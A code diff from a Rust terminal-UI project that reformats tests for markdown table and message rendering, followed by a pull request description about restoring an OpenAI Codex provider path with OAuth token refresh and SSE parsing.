+        .iter()
         .flat_map(|f| f.hunks.iter())
         .flat_map(|h| h.lines.iter())
         .filter(|l| l.kind == DiffLineKind::Context)

--- a/src-rust/crates/tui/tests/markdown_enhancements.rs
+++ b/src-rust/crates/tui/tests/markdown_enhancements.rs
@@ -1,8 +1,6 @@
 //! Tests for markdown table rendering and inline formatting (bold, italic, strikethrough).
 
-use claurst_tui::messages::{
-    render_markdown, detect_table, render_table, parse_inline_formatting,
-};
+use claurst_tui::messages::{detect_table, parse_inline_formatting, render_markdown, render_table};
 
 fn flatten(lines: &[ratatui::text::Line<'_>]) -> String {
     lines
@@ -35,7 +33,8 @@ fn table_basic_detection() {
 
 #[test]
 fn table_multiple_rows() {
-    let markdown = "| Col1 | Col2 |\n|------|------|\n| A    | B    |\n| C    | D    |\n| E    | F    |";
+    let markdown =
+        "| Col1 | Col2 |\n|------|------|\n| A    | B    |\n| C    | D    |\n| E    | F    |";
     let lines: Vec<&str> = markdown.lines().collect();
 
     let (table, end_idx) = detect_table(&lines, 0).expect("Table should be detected");
@@ -45,17 +44,27 @@ fn table_multiple_rows() {
 
 #[test]
 fn table_alignment_detection() {
-    let markdown = "| Left | Center | Right |\n|:-----|:------:|------:|\n| L    | C      | R     |";
+    let markdown =
+        "| Left | Center | Right |\n|:-----|:------:|------:|\n| L    | C      | R     |";
     let lines: Vec<&str> = markdown.lines().collect();
 
     let (table, _) = detect_table(&lines, 0).expect("Table should be detected");
     assert_eq!(table.alignments.len(), 3);
     // First column should be left-aligned
-    assert!(matches!(table.alignments[0], claurst_tui::messages::TableAlignment::Left));
+    assert!(matches!(
+        table.alignments[0],
+        claurst_tui::messages::TableAlignment::Left
+    ));
     // Second column should be center-aligned
-    assert!(matches!(table.alignments[1], claurst_tui::messages::TableAlignment::Center));
+    assert!(matches!(
+        table.alignments[1],
+        claurst_tui::messages::TableAlignment::Center
+    ));
     // Third column should be right-aligned
-    assert!(matches!(table.alignments[2], claurst_tui::messages::TableAlignment::Right));
+    assert!(matches!(
+        table.alignments[2],
+        claurst_tui::messages::TableAlignment::Right
+    ));
 }
 
 #[test]

--- a/src-rust/crates/tui/tests/render_snapshots.rs
+++ b/src-rust/crates/tui/tests/render_snapshots.rs
@@ -2,13 +2,11 @@
 //! Renders each message type and verifies key content in returned Lines.
 
 use claurst_tui::messages::{
-    render_assistant_text, render_user_text, render_tool_use,
-    render_tool_result_success, render_tool_result_error,
-    render_compact_boundary, render_summary_message,
-    render_unseen_divider, render_system_message, render_thinking_block,
-    render_rate_limit_banner, render_hook_progress, render_code_block,
-    render_user_command, render_user_memory_input, render_user_local_command_output,
-    RenderContext,
+    render_assistant_text, render_code_block, render_compact_boundary, render_hook_progress,
+    render_rate_limit_banner, render_summary_message, render_system_message, render_thinking_block,
+    render_tool_result_error, render_tool_result_success, render_tool_use, render_unseen_divider,
+    render_user_command, render_user_local_command_output, render_user_memory_input,
+    render_user_text, RenderContext,
 };
 
 // ---------------------------------------------------------------------------
@@ -28,7 +26,12 @@ fn flatten(lines: &[ratatui::text::Line<'_>]) -> String {
 
 #[test]
 fn assistant_text_renders_lines() {
-    let ctx = RenderContext { width: 80, highlight: true, show_thinking: false, ..Default::default() };
+    let ctx = RenderContext {
+        width: 80,
+        highlight: true,
+        show_thinking: false,
+        ..Default::default()
+    };
     let lines = render_assistant_text("Hello, world!\n\nSecond paragraph.", &ctx);
     assert!(!lines.is_empty());
     let combined = flatten(&lines);
@@ -234,7 +237,10 @@ fn user_local_command_output_shows_output_lines() {
 
 #[test]
 fn user_local_command_output_truncates_at_max_lines() {
-    let output = (0..50).map(|i| format!("line{}", i)).collect::<Vec<_>>().join("\n");
+    let output = (0..50)
+        .map(|i| format!("line{}", i))
+        .collect::<Vec<_>>()
+        .join("\n");
     let lines = render_user_local_command_output("cmd", &output, 10);
     let combined = flatten(&lines);
     assert!(combined.contains("more lines"));


### PR DESCRIPTION
## Summary
- restore the ChatGPT Plus/Pro `openai-codex` path end-to-end, including OAuth token refresh, `ChatGPT-Account-Id`, model selection, and runtime provider switching after `/connect`
- align the Codex request/response handling with the official ChatGPT backend shape, including required `instructions`, `store: false`, `stream: true`, and SSE response parsing
- keep the runtime behavior scoped to the Codex provider path so non-Codex providers continue using the existing request flow

## Verification
- `cargo check`
- `cargo build`
- `cargo test codex`
- `cargo test test_anthropic_to_openai_request_basic`
- `cargo test stream_accumulator_text`

## Notes
- I verified the runtime changes are gated to `openai-codex` / `openai-codex/*` selection in the query path.
- A broader existing repo test failure outside this Codex work was observed earlier in `crates/tui/tests/render_snapshots.rs` (`thinking_block_collapsed`), so the verification above is intentionally focused on the Codex path.